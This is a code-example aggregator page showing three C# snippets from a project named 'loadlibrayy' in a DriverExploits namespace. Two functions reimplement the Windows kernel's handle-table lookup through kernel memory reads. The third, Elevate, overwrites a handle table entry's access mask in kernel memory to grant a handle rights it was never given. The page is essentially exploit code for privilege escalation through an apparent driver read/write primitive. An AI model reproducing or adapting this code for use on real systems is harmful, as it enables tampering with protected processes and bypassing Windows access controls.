DriverExploits.ElevateHandle.ReadSystemMemory(ulong)

Here are the examples of the csharp api class DriverExploits.ElevateHandle.ReadSystemMemory(ulong) taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.

3 Examples 7

1. Example

Project: loadlibrayy
Source File: ElevateHandle.cs
private static NT._HANDLE_TABLE_ENTRY* ExpLookupHandleTableEntryWin7(void* HandleTable, ulong Handle)
        {
            ulong v2;     // r8@2
            ulong v3;     // rcx@2
            ulong v4;     // r8@2
            ulong result; // rax@4
            ulong v6;     // [sp+8h] [bp+8h]@1
            ulong table = (ulong)HandleTable;

            v6 = Handle;
            v6 = Handle & 0xFFFFFFFC;
            if (v6 >= *(uint*)(table + 92))
            {
                result = 0;
            }
            else
            {
                v2 = (*(ulong*)table);
                v3 = (*(ulong*)table) & 3;
                v4 = v2 - (uint)v3;
                if ((uint)v3 > 0)
                {
                    if ((uint)v3 == 1)
                        result = ReadSystemMemory<ulong>((((Handle - (Handle & 0x3FF)) >> 7) + v4)) + 4 * (Handle & 0x3FF);
                    else
                        result = ReadSystemMemory<ulong>((ulong)(ReadSystemMemory<ulong>((ulong)(((((Handle - (Handle & 0x3FF)) >> 7) - (((Handle - (Handle & 0x3FF)) >> 7) & 0xFFF)) >> 9) + v4)) + (((Handle - (Handle & 0x3FF)) >> 7) & 0xFFF))) + 4 * (Handle & 0x3FF);
                }
                else
                {
                    result = v4 + 4 * Handle;
                }
            }
            return (NT._HANDLE_TABLE_ENTRY*)result;
        }

2. Example

Project: loadlibrayy
Source File: ElevateHandle.cs
private static NT._HANDLE_TABLE_ENTRY* ExpLookupHandleTableEntry(void* HandleTable, ulong Handle)
        {
            ulong v2; // rdx@1
            long v3; // r8@2
            ulong result; // rax@4
            ulong v5;

            ulong a1 = (ulong)HandleTable;

            v2 = Handle & 0xFFFFFFFFFFFFFFFCu;
            if (v2 >= *(uint*)a1)
            {
                result = 0;
            }
            else
            {
                v3 = (long)*(ulong*)(a1 + 8);
                if ((*(ulong*)(a1 + 8) & 3) > 0)
                {
                    if ((*(uint*)(a1 + 8) & 3) == 1)
                    {
                        v5 = ReadSystemMemory<ulong>((ulong)v3 + 8 * (v2 >> 10) - 1);
                        result = v5 + 4 * (v2 & 0x3FF);
                    }
                    else
                    {
                        v5 = ReadSystemMemory<ulong>(ReadSystemMemory<ulong>((ulong)v3 + 8 * (v2 >> 19) - 2) + 8 * ((v2 >> 10) & 0x1FF));
                        result = v5 + 4 * (v2 & 0x3FF);
                    }
                }
                else
                {
                    result = (ulong)v3 + 4 * v2;
                }
            }
            return (NT._HANDLE_TABLE_ENTRY*)result;
        }

3. Example

Project: loadlibrayy
Source File: ElevateHandle.cs
public static bool Elevate(ulong handle, dynamic desiredAccess)
        {
            var handleTableAddress = ReadSystemMemory<ulong>(g_Context.KernelEntry + g_OffsetObjectTable);
            var handleTable = ReadSystemMemory<_HANDLE_TABLE>(handleTableAddress);
            
            NT._HANDLE_TABLE_ENTRY* entryAddress = g_IsWindows7Machine ? 
                ExpLookupHandleTableEntryWin7(&handleTable, handle) : 
                ExpLookupHandleTableEntry(&handleTable, handle);
            
            if ((ulong)entryAddress == 0)
                throw new Exception("ExpLookupHandleTableEntry/7 failed");
            
            var entry = ReadSystemMemory<NT._HANDLE_TABLE_ENTRY>((ulong)entryAddress);
            
            bool didElevate = WriteSystemMemory((ulong)entryAddress + sizeof(ulong), (ulong)desiredAccess);

            Log.LogInfo($"Elevating {handle.ToString("x2")} -> {desiredAccess.ToString("x2")} ? {didElevate}");

            return didElevate;
        }